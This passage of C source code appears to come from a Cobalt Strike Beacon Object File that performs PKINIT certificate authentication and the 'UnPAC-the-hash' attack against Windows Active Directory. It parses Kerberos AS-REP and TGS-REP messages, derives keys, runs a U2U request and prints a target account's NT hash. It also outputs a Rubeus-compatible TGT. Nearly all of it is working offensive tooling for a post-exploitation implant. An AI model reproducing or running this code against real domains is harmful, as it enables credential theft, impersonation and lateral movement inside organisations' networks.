if (tgsRep[offset] == 0x30) {
offset++;
int encDataLen;
offset += DecodeLength(tgsRep, offset, &encDataLen);
int encDataEnd = offset + encDataLen;
/* Find cipher [2] */
while (offset < encDataEnd) {
if (tgsRep[offset] == 0xA2) {
offset++;
offset += DecodeLength(tgsRep, offset, &length);
if (tgsRep[offset] == 0x04) {
offset++;
offset += DecodeLength(tgsRep, offset, cipherLen);
BYTE* cipher = (BYTE*)malloc(*cipherLen);
memcpy(cipher, tgsRep + offset, *cipherLen);
return cipher;
}
} else if ((tgsRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(tgsRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
}
break;
} else if ((tgsRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(tgsRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
break;
} else if ((tgsRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(tgsRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
*cipherLen = 0;
return NULL;
}
/* Extract PAC from EncTicketPart authorization-data */
static BYTE* ExtractPacFromEncTicketPart(BYTE* encTicketPart, int encTicketPartLen, int* pacLen) {
int offset = 0;
int length;
/* Skip APPLICATION 3 if present */
if (encTicketPart[offset] == 0x63) {
offset++;
offset += DecodeLength(encTicketPart, offset, &length);
}
/* Skip SEQUENCE */
if (encTicketPart[offset] == 0x30) {
offset++;
offset += DecodeLength(encTicketPart, offset, &length);
}
/* Find authorization-data [10] */
while (offset < encTicketPartLen - 10) {
if (encTicketPart[offset] == 0xAA) {
offset++;
int authDataLen;
offset += DecodeLength(encTicketPart, offset, &authDataLen);
/* Parse authorization-data for PAC (ad-type 128) */
/* May be wrapped in AD-IF-RELEVANT (type 1) */
return ExtractPacFromAuthData(encTicketPart + offset, authDataLen, pacLen);
} else if ((encTicketPart[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(encTicketPart, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
*pacLen = 0;
return NULL;
}
/* Recursive extraction of PAC from AuthorizationData */
static BYTE* ExtractPacFromAuthData(BYTE* authData, int authDataLen, int* pacLen) {
int offset = 0;
int length;
/* Skip SEQUENCE if present */
if (authData[offset] == 0x30) {
offset++;
offset += DecodeLength(authData, offset, &length);
}
while (offset < authDataLen - 5) {
if (authData[offset] == 0x30) {
offset++;
int elemLen;
offset += DecodeLength(authData, offset, &elemLen);
int elemEnd = offset + elemLen;
int adType = -1;
BYTE* adData = NULL;
int adDataLen = 0;
while (offset < elemEnd) {
if (authData[offset] == 0xA0) { /* ad-type [0] */
offset++;
offset += DecodeLength(authData, offset, &length);
if (authData[offset] == 0x02) {
offset++;
int intLen = authData[offset++];
adType = 0;
for (int i = 0; i < intLen; i++) {
adType = (adType << 8) | authData[offset++];
}
}
} else if (authData[offset] == 0xA1) { /* ad-data [1] */
offset++;
offset += DecodeLength(authData, offset, &length);
if (authData[offset] == 0x04) {
offset++;
offset += DecodeLength(authData, offset, &adDataLen);
adData = authData + offset;
offset += adDataLen;
}
} else {
offset++;
}
}
if (adType == 1 && adData) { /* AD-IF-RELEVANT - recurse */
BYTE* result = ExtractPacFromAuthData(adData, adDataLen, pacLen);
if (result) return result;
} else if (adType == 128 && adData) { /* PAC */
BYTE* result = (BYTE*)malloc(adDataLen);
memcpy(result, adData, adDataLen);
*pacLen = adDataLen;
return result;
}
offset = elemEnd;
} else {
offset++;
}
}
*pacLen = 0;
return NULL;
}
/* Parse PAC structure and extract PAC_CREDENTIAL_INFO */
static void ParsePacAndExtractNtHash(BYTE* pac, int pacLen, BYTE* replyKey, int replyKeyLen) {
if (pacLen < 8) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] PAC too small");
return;
}
DWORD cBuffers = *(DWORD*)pac;
int offset = 8;
for (DWORD i = 0; i < cBuffers && offset + 16 <= pacLen; i++) {
DWORD ulType = *(DWORD*)(pac + offset);
DWORD cbBufferSize = *(DWORD*)(pac + offset + 4);
ULONGLONG bufferOffset = *(ULONGLONG*)(pac + offset + 8);
/* Type 2 = PAC_CREDENTIAL_INFO */
if (ulType == 2 && bufferOffset + cbBufferSize <= (ULONGLONG)pacLen) {
BYTE* credInfo = pac + bufferOffset;
if (cbBufferSize < 8) {
continue;
}
DWORD encType = *(DWORD*)(credInfo + 4);
BYTE* encData = credInfo + 8;
int encDataLen = cbBufferSize - 8;
/* Decrypt with AS reply key (key usage 16) */
int decLen;
BYTE* decrypted = KerberosDecrypt(encType, KRB_KEY_USAGE_PAC_CREDENTIAL,
replyKey, replyKeyLen, encData, encDataLen, &decLen);
if (decrypted) {
ParsePacCredentialData(decrypted, decLen);
free(decrypted);
} else {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt PAC_CREDENTIAL_INFO");
}
}
offset += 16;
}
}
/* Process TGS-REP and extract NT hash */
static void ProcessTgsRep(BYTE* tgsRep, int tgsRepLen, BYTE* sessionKey, int sessionKeyLen,
BYTE* replyKey, int replyKeyLen) {
/* Check message type */
if (tgsRep[0] == 0x7E) {
/* KRB-ERROR */
BeaconPrintf(CALLBACK_OUTPUT, "[!] TGS-REQ returned KRB-ERROR");
int i;
for (i = 0; i < tgsRepLen - 5; i++) {
if (tgsRep[i] == 0xA6 && tgsRep[i+2] == 0x02) {
int errCode = 0;
int errLen = tgsRep[i+3];
for (int j = 0; j < errLen; j++) {
errCode = (errCode << 8) | tgsRep[i+4+j];
}
BeaconPrintf(CALLBACK_OUTPUT, "[!] Error code: %d - %s", errCode, GetKrbErrorDesc(errCode));
break;
}
}
return;
}
if (tgsRep[0] != 0x6D) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Unexpected TGS response type: 0x%02X", tgsRep[0]);
return;
}
/* Extract ticket enc-part */
int ticketEncPartLen;
BYTE* ticketEncPart = ExtractTicketEncPartFromTgsRep(tgsRep, tgsRepLen, &ticketEncPartLen);
if (!ticketEncPart) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract ticket enc-part from TGS-REP");
return;
}
/* Decrypt with session key (key usage 2 for U2U ticket enc-part) */
int decTicketLen;
BYTE* decTicket = KerberosDecrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_TICKET_ENCPART,
sessionKey, sessionKeyLen, ticketEncPart, ticketEncPartLen, &decTicketLen);
free(ticketEncPart);
if (!decTicket) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt ticket enc-part");
return;
}
/* Extract PAC from authorization-data */
int pacLen;
BYTE* pac = ExtractPacFromEncTicketPart(decTicket, decTicketLen, &pacLen);
free(decTicket);
if (!pac) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract PAC from EncTicketPart");
return;
}
/* Parse PAC and extract NT hash */
ParsePacAndExtractNtHash(pac, pacLen, replyKey, replyKeyLen);
free(pac);
}
/* Perform U2U TGS-REQ to extract NT hash */
static void PerformU2U(const char* kdcHost, const char* user, const char* realm,
BYTE* ticket, int ticketLen, BYTE* sessionKey, int sessionKeyLen,
BYTE* replyKey, int replyKeyLen) {
/* Build TGS-REQ */
int tgsReqLen;
BYTE* tgsReq = BuildU2UTgsReq(user, realm, ticket, ticketLen, sessionKey, sessionKeyLen, &tgsReqLen);
if (!tgsReq) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build U2U TGS-REQ");
return;
}
/* Send to KDC */
int tgsRepLen;
BYTE* tgsRep = SendToKdc(kdcHost, 88, tgsReq, tgsReqLen, &tgsRepLen);
free(tgsReq);
if (!tgsRep) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to send TGS-REQ to KDC");
return;
}
/* Process TGS-REP */
ProcessTgsRep(tgsRep, tgsRepLen, sessionKey, sessionKeyLen, replyKey, replyKeyLen);
free(tgsRep);
}
/*
* =============================================================================
* UnPAC-the-hash - AS-REP Parsing
* =============================================================================
*/
/* Extract enc-part cipher from AS-REP */
static BYTE* ExtractEncPartFromAsRep(BYTE* asRep, int asRepLen, int* cipherLen) {
int offset = 0;
int length;
/* Skip APPLICATION 11 tag */
if (asRep[offset] == 0x6B) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Skip outer SEQUENCE */
if (asRep[offset] == 0x30) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Find enc-part [6] */
while (offset < asRepLen - 10) {
if (asRep[offset] == 0xA6) {
offset++;
offset += DecodeLength(asRep, offset, &length);
/* EncryptedData SEQUENCE */
if (asRep[offset] == 0x30) {
offset++;
int encDataLen;
offset += DecodeLength(asRep, offset, &encDataLen);
int encDataEnd = offset + encDataLen;
/* Find cipher [2] */
while (offset < encDataEnd) {
if (asRep[offset] == 0xA2) {
offset++;
offset += DecodeLength(asRep, offset, &length);
if (asRep[offset] == 0x04) {
offset++;
offset += DecodeLength(asRep, offset, cipherLen);
BYTE* cipher = (BYTE*)malloc(*cipherLen);
memcpy(cipher, asRep + offset, *cipherLen);
return cipher;
}
} else if ((asRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(asRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
}
break;
} else if ((asRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(asRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
return NULL;
}
/* Extract session key from decrypted EncASRepPart */
static BYTE* ExtractSessionKey(BYTE* decrypted, int decryptedLen, int* keyLen, int* keyType) {
int offset = 0;
int length;
/* Skip APPLICATION 25 if present */
if (decrypted[offset] == 0x79) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
}
/* Skip SEQUENCE */
if (decrypted[offset] == 0x30) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
}
/* Find key [0] */
if (decrypted[offset] == 0xA0) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
/* EncryptionKey SEQUENCE */
if (decrypted[offset] == 0x30) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
/* keytype [0] */
if (decrypted[offset] == 0xA0) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
if (decrypted[offset] == 0x02) {
offset++;
int intLen = decrypted[offset++];
*keyType = 0;
for (int i = 0; i < intLen; i++) {
*keyType = (*keyType << 8) | decrypted[offset++];
}
}
}
/* keyvalue [1] */
if (decrypted[offset] == 0xA1) {
offset++;
offset += DecodeLength(decrypted, offset, &length);
if (decrypted[offset] == 0x04) {
offset++;
offset += DecodeLength(decrypted, offset, keyLen);
BYTE* keyValue = (BYTE*)malloc(*keyLen);
memcpy(keyValue, decrypted + offset, *keyLen);
return keyValue;
}
}
}
}
return NULL;
}
/* Extract PA-PAC-CREDENTIALS from AS-REP padata */
static BYTE* ExtractPaPacCredentials(BYTE* asRep, int asRepLen, int* credLen) {
int offset = 0;
int length;
/* Skip APPLICATION 11 tag */
if (asRep[offset] == 0x6B) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Skip outer SEQUENCE */
if (asRep[offset] == 0x30) {
offset++;
offset += DecodeLength(asRep, offset, &length);
}
/* Find padata [2] */
int padataOffset = -1;
int padataEnd = -1;
while (offset < asRepLen - 10) {
if (asRep[offset] == 0xA2) {
offset++;
int padataLen;
offset += DecodeLength(asRep, offset, &padataLen);
padataOffset = offset;
padataEnd = offset + padataLen;
break;
} else if ((asRep[offset] & 0xE0) == 0xA0) {
offset++;
int skipLen;
offset += DecodeLength(asRep, offset, &skipLen);
offset += skipLen;
} else {
offset++;
}
}
if (padataOffset < 0) return NULL;
/* Parse padata SEQUENCE for type 167 */
int pos = padataOffset;
if (asRep[pos] == 0x30) {
pos++;
pos += DecodeLength(asRep, pos, &length);
}
while (pos < padataEnd - 5) {
if (asRep[pos] != 0x30) {
pos++;
continue;
}
pos++;
int paDataLen;
pos += DecodeLength(asRep, pos, &paDataLen);
int paDataEnd = pos + paDataLen;
int padataType = -1;
int valueOffset = -1;
int valueLen = 0;
while (pos < paDataEnd) {
BYTE tag = asRep[pos];
if (tag == 0xA1) {
pos++;
pos += DecodeLength(asRep, pos, &length);
if (asRep[pos] == 0x02) {
pos++;
int intLen = asRep[pos++];
padataType = 0;
for (int i = 0; i < intLen; i++) {
padataType = (padataType << 8) | asRep[pos++];
}
}
} else if (tag == 0xA2) {
pos++;
int ctxLen;
pos += DecodeLength(asRep, pos, &ctxLen);
if (asRep[pos] == 0x04) {
pos++;
pos += DecodeLength(asRep, pos, &valueLen);
valueOffset = pos;
pos += valueLen;
} else {
valueOffset = pos;
valueLen = ctxLen;
pos += ctxLen;
}
} else {
pos++;
if (pos < paDataEnd) {
int skipLen;
pos += DecodeLength(asRep, pos, &skipLen);
pos += skipLen;
}
}
}
if (padataType == PA_PAC_CREDENTIALS && valueOffset > 0) {
BYTE* result = (BYTE*)malloc(valueLen);
memcpy(result, asRep + valueOffset, valueLen);
*credLen = valueLen;
return result;
}
pos = paDataEnd;
}
return NULL;
}
/* Parse PAC_CREDENTIAL_DATA and extract NT hash */
static void ParsePacCredentialData(BYTE* data, int dataLen) {
int i, j;
if (dataLen < 8) {
return;
}
/* PAC_CREDENTIAL_DATA is NDR encoded:
* NTLM_SUPPLEMENTAL_CREDENTIAL contains the NT hash at offset +24
*/
/* Method 1: Search for "NTLM" string (Unicode: 'N' 00 'T' 00 'L' 00 'M' 00) */
for (i = 0; i < dataLen - 50; i++) {
if (data[i] == 'N' && data[i+1] == 0 &&
data[i+2] == 'T' && data[i+3] == 0 &&
data[i+4] == 'L' && data[i+5] == 0 &&
data[i+6] == 'M' && data[i+7] == 0) {
/* NTLM_SUPPLEMENTAL_CREDENTIAL typically follows:
* After package name + padding, look for the structure:
* Version (4), Flags (4), LmPassword (16), NtPassword (16)
* Total 40 bytes of credential data
*/
for (j = i + 8; j < dataLen - 40; j++) {
/* Look for Version=0 and reasonable Flags */
if (*(DWORD*)(data + j) == 0) {
DWORD flags = *(DWORD*)(data + j + 4);
/* Common flags: 0x01 (NtPresent), 0x02 (LmPresent), etc */
if (flags > 0 && flags < 0x100) {
BYTE* lmHash = data + j + 8;
BYTE* ntHash = data + j + 24;
/* Check if NT hash looks valid (not all zeros, not all same) */
int hasData = 0;
for (int k = 0; k < 16; k++) {
if (ntHash[k] != 0) hasData = 1;
}
if (hasData) {
BeaconPrintf(CALLBACK_OUTPUT, "[+] NT Hash: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
ntHash[0], ntHash[1], ntHash[2], ntHash[3],
ntHash[4], ntHash[5], ntHash[6], ntHash[7],
ntHash[8], ntHash[9], ntHash[10], ntHash[11],
ntHash[12], ntHash[13], ntHash[14], ntHash[15]);
return;
}
}
}
}
}
}
/* Method 2: Direct scan at expected offsets in PAC_CREDENTIAL_DATA */
int offsets[] = {0x30, 0x38, 0x40, 0x48, 0x50, 0x58, 0x60, 0x68};
for (j = 0; j < 8; j++) {
int off = offsets[j];
if (off + 40 <= dataLen) {
BYTE* ntHash = data + off + 24;
int hasData = 0, unique = 0;
BYTE seen[256] = {0};
for (i = 0; i < 16; i++) {
if (ntHash[i] != 0) hasData = 1;
if (!seen[ntHash[i]]) {
seen[ntHash[i]] = 1;
unique++;
}
}
if (hasData && unique >= 6) {
BeaconPrintf(CALLBACK_OUTPUT, "[+] NT Hash: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
ntHash[0], ntHash[1], ntHash[2], ntHash[3],
ntHash[4], ntHash[5], ntHash[6], ntHash[7],
ntHash[8], ntHash[9], ntHash[10], ntHash[11],
ntHash[12], ntHash[13], ntHash[14], ntHash[15]);
return;
}
}
}
}
/*
* =============================================================================
* kTruncate - RFC 4556 Key Derivation
* =============================================================================
*/
/* Compute SHA-1 hash */
static void ComputeSha1(BYTE* data, int dataLen, BYTE* hash) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
DWORD hashLen = 20;
if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
CryptHashData(hHash, data, dataLen, 0);
CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0);
CryptDestroyHash(hHash);
}
CryptReleaseContext(hProv, 0);
}
}
/* kTruncate function - RFC 4556 Section 3.2.3.1 */
static void KTruncate(int k, BYTE* x, int xLen, BYTE* result) {
int offset = 0;
BYTE counter = 0;
BYTE* toHash = (BYTE*)malloc(1 + xLen);
while (offset < k) {
BYTE hash[20];
int copyLen;
/* Hash = SHA1(counter || x) */
toHash[0] = counter;
memcpy(toHash + 1, x, xLen);
ComputeSha1(toHash, 1 + xLen, hash);
/* Copy hash bytes to result */
copyLen = (k - offset < 20) ? (k - offset) : 20;
memcpy(result + offset, hash, copyLen);
offset += copyLen;
counter++;
}
free(toHash);
}
/* Derive session key from DH shared secret (RFC 4556) */
static void DeriveSessionKey(BYTE* sharedSecret, int secretLen, BYTE* serverNonce, int nonceLen, BYTE* sessionKey, int keyLen) {
/* x = Z || server_nonce (client nonce is empty per Rubeus) */
int xLen = secretLen + nonceLen;
BYTE* x = (BYTE*)malloc(xLen);
memcpy(x, sharedSecret, secretLen);
if (nonceLen > 0 && serverNonce) {
memcpy(x + secretLen, serverNonce, nonceLen);
}
/* Apply kTruncate */
KTruncate(keyLen, x, xLen, sessionKey);
free(x);
}
/*
* =============================================================================
* Extract KDC DH Public Key from PA-PK-AS-REP
* =============================================================================
*/
/* Extract KDC's DH public key from AS-REP */
static BYTE* ExtractKdcDhPublicKey(BYTE* asRep, int asRepLen, int* keyLen) {
int i;
/* DH OID pattern: 1.2.840.10046.2.1 = 2A 86 48 CE 3E 02 01 */
BYTE dhOidPattern[] = { 0x2A, 0x86, 0x48, 0xCE, 0x3E, 0x02, 0x01 };
/* Search for DH OID in response */
for (i = 0; i < asRepLen - (int)sizeof(dhOidPattern) - 10; i++) {
int j, found = 1;
for (j = 0; j < (int)sizeof(dhOidPattern); j++) {
if (asRep[i + j] != dhOidPattern[j]) {
found = 0;
break;
}
}
if (found) {
/* Found DH OID, now search for large INTEGER (~128 bytes) */
int searchStart = i + sizeof(dhOidPattern);
int searchEnd = (searchStart + 500 < asRepLen) ? searchStart + 500 : asRepLen - 10;
for (j = searchStart; j < searchEnd; j++) {
if (asRep[j] == 0x02) { /* INTEGER tag */
int len = 0;
int lenBytes = 1;
int dataOffset;
if ((asRep[j + 1] & 0x80) != 0) {
lenBytes = (asRep[j + 1] & 0x7F) + 1;
int k;
for (k = 1; k < lenBytes; k++) {
len = (len << 8) | asRep[j + 1 + k];
}
} else {
len = asRep[j + 1];
}
dataOffset = j + 1 + lenBytes;
/* Looking for ~128 byte integer (DH public key) */
if (len >= 120 && len <= 140) {
BYTE* result = (BYTE*)malloc(128);
BYTE* intData = asRep + dataOffset;
int copyLen = len;
int destOffset = 0;
/* Skip leading zero if present */
if (intData[0] == 0 && copyLen > 1) {
intData++;
copyLen--;
}
/* Pad to 128 bytes */
memset(result, 0, 128);
destOffset = 128 - copyLen;
if (destOffset < 0) destOffset = 0;
memcpy(result + destOffset, intData, (copyLen > 128) ? 128 : copyLen);
*keyLen = 128;
return result;
}
}
}
}
}
/* Fallback: Search for any large INTEGER that could be the DH public key */
for (i = 0; i < asRepLen - 140; i++) {
if (asRep[i] == 0x02) { /* INTEGER tag */
int len = 0;
int lenBytes = 1;
int dataOffset;
if ((asRep[i + 1] & 0x80) != 0) {
lenBytes = (asRep[i + 1] & 0x7F) + 1;
int k;
for (k = 1; k < lenBytes; k++) {
len = (len << 8) | asRep[i + 1 + k];
}
} else {
len = asRep[i + 1];
}
/* Looking for ~128 byte integer (DH public key) */
if (len >= 120 && len <= 140) {
dataOffset = i + 1 + lenBytes;
BYTE* result = (BYTE*)malloc(128);
BYTE* intData = asRep + dataOffset;
int copyLen = len;
int destOffset = 0;
/* Skip leading zero if present */
if (intData[0] == 0 && copyLen > 1) {
intData++;
copyLen--;
}
/* Pad to 128 bytes */
memset(result, 0, 128);
destOffset = 128 - copyLen;
if (destOffset < 0) destOffset = 0;
memcpy(result + destOffset, intData, (copyLen > 128) ? 128 : copyLen);
*keyLen = 128;
return result;
}
}
}
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not find DH public key (no 128-byte INTEGER found)");
*keyLen = 0;
return NULL;
}
/* Extract server DH nonce from PA-PK-AS-REP */
static BYTE* ExtractServerDhNonce(BYTE* asRep, int asRepLen, int* nonceLen) {
int i;
/* Search for 32-byte OCTET STRING that could be server nonce */
for (i = 0; i < asRepLen - 34; i++) {
if (asRep[i] == 0x04 && asRep[i + 1] == 0x20) { /* OCTET STRING of 32 bytes */
BYTE* candidate = asRep + i + 2;
int j, hasVariation = 0, allZero = 1;
for (j = 1; j < 32; j++) {
if (candidate[j] != candidate[0]) hasVariation = 1;
if (candidate[j] != 0) allZero = 0;
}
if (hasVariation && !allZero) {
BYTE* result = (BYTE*)malloc(32);
memcpy(result, candidate, 32);
*nonceLen = 32;
return result;
}
}
}
*nonceLen = 0;
return NULL;
}
/* Kerberos error code descriptions */
static const char* GetKrbErrorDesc(int code) {
switch(code) {
case 3: return "KDC_ERR_BAD_PVNO - Bad protocol version";
case 6: return "KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in database";
case 7: return "KDC_ERR_S_PRINCIPAL_UNKNOWN - Server not found in database";
case 14: return "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED - Checksum must be included";
case 16: return "KDC_ERR_PADATA_TYPE_NOSUPP - PA-DATA type not supported";
case 17: return "KDC_ERR_TRTYPE_NOSUPP - Transited type not supported";
case 18: return "KDC_ERR_CLIENT_REVOKED - Client's credentials revoked";
case 24: return "KDC_ERR_PREAUTH_FAILED - Pre-authentication failed";
case 25: return "KDC_ERR_PREAUTH_REQUIRED - Pre-authentication required";
case 41: return "KDC_ERR_CLIENT_NOT_TRUSTED - Client not trusted for PKINIT";
case 42: return "KDC_ERR_KDC_NOT_TRUSTED - KDC not trusted for PKINIT";
case 43: return "KDC_ERR_INVALID_SIG - Invalid certificate signature";
case 44: return "KDC_ERR_DH_KEY_PARAMETERS_NOT_ACCEPTED - DH parameters rejected";
case 62: return "KRB_AP_ERR_USER_TO_USER_REQUIRED - U2U required";
case 68: return "KDC_ERR_WRONG_REALM - Wrong realm";
case 69: return "KDC_ERR_CANT_VERIFY_CERTIFICATE - Cannot verify certificate";
case 70: return "KDC_ERR_INVALID_CERTIFICATE - Invalid certificate";
case 71: return "KDC_ERR_REVOKED_CERTIFICATE - Certificate revoked";
case 72: return "KDC_ERR_REVOCATION_STATUS_UNKNOWN - Revocation status unknown";
case 73: return "KDC_ERR_REVOCATION_STATUS_UNAVAILABLE - Revocation status unavailable";
case 75: return "KDC_ERR_INCONSISTENT_KEY_PURPOSE - Inconsistent key purpose";
case 76: return "KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED - Digest in cert not accepted";
case 77: return "KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED - PA checksum must be included";
case 78: return "KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED - Digest in signed data not accepted";
case 79: return "KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED - Public key encryption not supported";
default: return "Unknown error";
}
}
/* Process AS-REP and extract NT hash */
static void ProcessAsRep(BYTE* asRep, int asRepLen, PCCERT_CONTEXT pCert,
const char* user, const char* realm, const char* kdcHost, int noUnpac) {
/* Check message type */
if (asRep[0] == 0x7E) {
/* KRB-ERROR */
BeaconPrintf(CALLBACK_OUTPUT, "[!] Received KRB-ERROR");
/* Parse error code */
int i;
int errCode = -1;
for (i = 0; i < asRepLen - 5; i++) {
if (asRep[i] == 0xA6 && asRep[i+2] == 0x02) { /* error-code [6] INTEGER */
errCode = 0;
int errLen = asRep[i+3];
int j;
for (j = 0; j < errLen; j++) {
errCode = (errCode << 8) | asRep[i+4+j];
}
BeaconPrintf(CALLBACK_OUTPUT, "[!] Error code: %d (0x%X)", errCode, errCode);
BeaconPrintf(CALLBACK_OUTPUT, "[!] %s", GetKrbErrorDesc(errCode));
break;
}
}
/* Try to find e-text [11] GeneralString */
for (i = 0; i < asRepLen - 5; i++) {
if (asRep[i] == 0xAB) { /* e-text [11] */
int textLen;
int lenBytes = DecodeLength(asRep, i+1, &textLen);
if (asRep[i+1+lenBytes] == 0x1B) { /* GeneralString */
int strLen;
int strLenBytes = DecodeLength(asRep, i+2+lenBytes, &strLen);
if (strLen > 0 && strLen < 256) {
char etext[256] = {0};
memcpy(etext, asRep + i + 2 + lenBytes + strLenBytes, strLen < 255 ? strLen : 255);
BeaconPrintf(CALLBACK_OUTPUT, "[!] e-text: %s", etext);
}
}
break;
}
}
return;
}
if (asRep[0] != 0x6B) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Unexpected response type: 0x%02X", asRep[0]);
return;
}
BeaconPrintf(CALLBACK_OUTPUT, "[+] TGT obtained!");
/* Step 1: Extract KDC's DH public key */
int kdcPubKeyLen;
BYTE* kdcPubKey = ExtractKdcDhPublicKey(asRep, asRepLen, &kdcPubKeyLen);
if (!kdcPubKey) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract KDC DH public key");
return;
}
/* Step 2: Extract server DH nonce (optional) */
int serverNonceLen;
BYTE* serverNonce = ExtractServerDhNonce(asRep, asRepLen, &serverNonceLen);
/* Step 3: Compute DH shared secret: KDC_pubkey^our_privkey mod p */
BigInt p, y, x, sharedSecret;
bigint_from_bytes(&p, DH_P_MODP2, sizeof(DH_P_MODP2));
bigint_from_bytes(&y, kdcPubKey, kdcPubKeyLen);
bigint_from_bytes(&x, g_dhPrivateKey, sizeof(g_dhPrivateKey));
bigint_modpow(&sharedSecret, &y, &x, &p);
BYTE sharedSecretBytes[128];
bigint_to_bytes(&sharedSecret, sharedSecretBytes, 128);
/* Step 4: Derive reply key using kTruncate (32 bytes for AES256) */
BYTE replyKey[32];
DeriveSessionKey(sharedSecretBytes, 128, serverNonce, serverNonceLen, replyKey, 32);
/* Store reply key globally */
memcpy(g_replyKey, replyKey, 32);
/* Step 5: Extract and decrypt enc-part */
int encPartLen;
BYTE* encPart = ExtractEncPartFromAsRep(asRep, asRepLen, &encPartLen);
if (!encPart) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract enc-part");
free(kdcPubKey);
if (serverNonce) free(serverNonce);
return;
}
/* Decrypt enc-part with reply key (key usage 3) */
int decryptedLen;
BYTE* decrypted = KerberosDecrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_AS_REP_ENCPART,
replyKey, 32, encPart, encPartLen, &decryptedLen);
free(encPart);
if (!decrypted) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt enc-part");
free(kdcPubKey);
if (serverNonce) free(serverNonce);
return;
}
/* Step 6: Extract session key from EncASRepPart */
int sessionKeyLen, sessionKeyType;
BYTE* sessionKey = ExtractSessionKey(decrypted, decryptedLen, &sessionKeyLen, &sessionKeyType);
free(decrypted);
if (!sessionKey) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract session key");
free(kdcPubKey);
if (serverNonce) free(serverNonce);
return;
}
/* Store session key globally */
memcpy(g_sessionKey, sessionKey, sessionKeyLen);
/* Output TGT in kirbi format (Rubeus compatible) */
{
int kirbiTgtLen;
BYTE* kirbiTgt = ExtractTicketFromAsRep(asRep, asRepLen, &kirbiTgtLen);
if (kirbiTgt) {
OutputKirbi(kirbiTgt, kirbiTgtLen, sessionKey, sessionKeyLen, sessionKeyType, user, realm);
free(kirbiTgt);
}
}
/* Step 7: Look for PA-PAC-CREDENTIALS and decrypt */
int pacCredLen;
BYTE* pacCred = ExtractPaPacCredentials(asRep, asRepLen, &pacCredLen);
if (pacCred) {
/* Decrypt with session key (key usage 16) */
int decCredLen;
BYTE* decCred = KerberosDecrypt(sessionKeyType, KRB_KEY_USAGE_PAC_CREDENTIAL,
sessionKey, sessionKeyLen, pacCred, pacCredLen, &decCredLen);
free(pacCred);
if (decCred) {
ParsePacCredentialData(decCred, decCredLen);
free(decCred);
} else {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt PA-PAC-CREDENTIALS");
}
} else if (!noUnpac) {
/* Extract TGT from AS-REP for U2U */
int tgtLen;
BYTE* tgt = ExtractTicketFromAsRep(asRep, asRepLen, &tgtLen);
if (tgt) {
/* Perform U2U to get NT hash */
PerformU2U(kdcHost, user, realm, tgt, tgtLen, sessionKey, sessionKeyLen, replyKey, 32);
free(tgt);
} else {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to extract TGT from AS-REP");
}
}
/* Cleanup */
free(kdcPubKey);
free(sessionKey);
if (serverNonce) free(serverNonce);
}
/*
* =============================================================================
* Certificate Loading - From Base64 or File
* =============================================================================
*/
/* Load certificate from base64 encoded PFX */
static PCCERT_CONTEXT LoadCertificateFromBase64(const char* base64Pfx, const char* password) {
BYTE* pfxData = NULL;
DWORD pfxLen = 0;
HCERTSTORE hStore = NULL;
PCCERT_CONTEXT pCert = NULL;
WCHAR wPassword[256] = {0};
if (!base64Pfx || !base64Pfx[0]) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] No PFX data provided");
return NULL;
}
/* Convert password to wide string */
if (password && password[0]) {
MultiByteToWideChar(CP_ACP, 0, password, -1, wPassword, 256);
}
/* Decode base64 to binary */
DWORD base64Len = (DWORD)strlen(base64Pfx);
/* Get required buffer size - use ANY flag for flexibility */
